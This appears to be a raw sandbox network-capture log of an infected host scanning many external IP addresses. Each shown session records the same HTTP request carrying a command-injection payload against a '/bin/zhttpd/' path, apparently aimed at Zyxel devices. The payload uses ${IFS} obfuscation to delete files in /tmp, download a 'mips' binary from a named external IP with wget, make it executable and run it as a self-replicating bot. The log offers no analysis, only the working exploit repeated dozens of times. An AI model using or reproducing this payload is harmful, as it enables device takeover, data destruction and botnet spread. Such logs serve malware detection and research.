                              Mar 31, 2024 08:41:14.684084892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2699192.168.2.1353890190.116.140.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684134007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2700192.168.2.134438227.134.225.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684165001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2701192.168.2.1347824107.105.129.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684201002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2702192.168.2.134523420.46.178.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684256077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2703192.168.2.134783640.214.171.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684293985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2704192.168.2.133373076.190.138.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684355974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2705192.168.2.135403478.51.178.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684405088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2706192.168.2.1339164138.69.213.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684438944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2707192.168.2.1339676167.223.244.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684499025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2708192.168.2.134716654.85.169.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684552908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2709192.168.2.1336496116.160.254.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684585094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2710192.168.2.135665235.200.203.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684626102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2711192.168.2.136061617.201.14.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684655905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2712192.168.2.135499853.133.0.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684706926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2713192.168.2.1357790148.238.19.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684740067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2714192.168.2.135250483.252.248.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684794903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2715192.168.2.134609035.129.175.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684834003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2716192.168.2.133762847.148.203.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684890985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2717192.168.2.1333226158.104.43.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684928894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2718192.168.2.1340668117.19.84.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.684982061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2719192.168.2.1339506128.231.65.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685029030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2720192.168.2.1346072125.97.119.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685080051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2721192.168.2.134414495.202.120.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685136080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2722192.168.2.1333984107.168.133.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685173988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2723192.168.2.1355174160.198.88.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685240030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2724192.168.2.135189048.28.119.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685295105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2725192.168.2.1353512212.54.70.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685357094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2726192.168.2.135714817.203.196.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685405016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2727192.168.2.1348042192.143.6.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685453892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2728192.168.2.1359512101.93.205.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685494900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2729192.168.2.134046631.37.70.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685565948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2730192.168.2.133630240.47.140.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685597897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2731192.168.2.1355074182.4.58.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685650110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2732192.168.2.135166666.166.187.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685694933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2733192.168.2.133459860.123.194.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685749054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2734192.168.2.1338060185.18.26.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685784101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2735192.168.2.1355196140.206.99.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685815096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2736192.168.2.135758617.72.224.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685879946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2737192.168.2.1345442193.4.32.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685894966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2738192.168.2.134867219.112.198.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.685961962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2739192.168.2.1359084218.143.241.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686011076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2740192.168.2.1360632218.36.57.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686075926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2741192.168.2.1347946116.147.149.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686126947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2742192.168.2.134604252.225.214.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686213017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2743192.168.2.1357666158.90.118.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686237097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2744192.168.2.1359970108.89.95.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686295033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2745192.168.2.1360044164.171.225.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686357021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2746192.168.2.1339970165.97.147.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686402082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2747192.168.2.1348580186.67.35.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686434031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2748192.168.2.135168685.156.142.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686480045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2749192.168.2.1359712190.120.132.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686563015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2750192.168.2.1340836179.219.247.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686595917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2751192.168.2.1339670204.81.88.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686645985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2752192.168.2.1345602198.221.155.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686657906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2753192.168.2.1351288149.181.141.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686739922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2754192.168.2.1348306133.97.168.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686780930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2755192.168.2.1334554217.161.45.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686826944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2756192.168.2.1353932154.187.249.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686872005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2757192.168.2.134477089.83.64.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686913967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2758192.168.2.1344166153.198.250.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.686978102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2759192.168.2.134805684.87.57.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687011003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2760192.168.2.1350482207.241.53.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687067032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2761192.168.2.133831887.186.2.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687119961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2762192.168.2.1360418150.71.48.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687185049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2763192.168.2.134309281.84.133.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687243938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2764192.168.2.1352318120.71.91.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687298059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2765192.168.2.133691278.97.79.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687326908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2766192.168.2.1339478172.210.163.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687372923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2767192.168.2.1348386123.172.28.5443
                              TimestampBytes transferredDirectionData
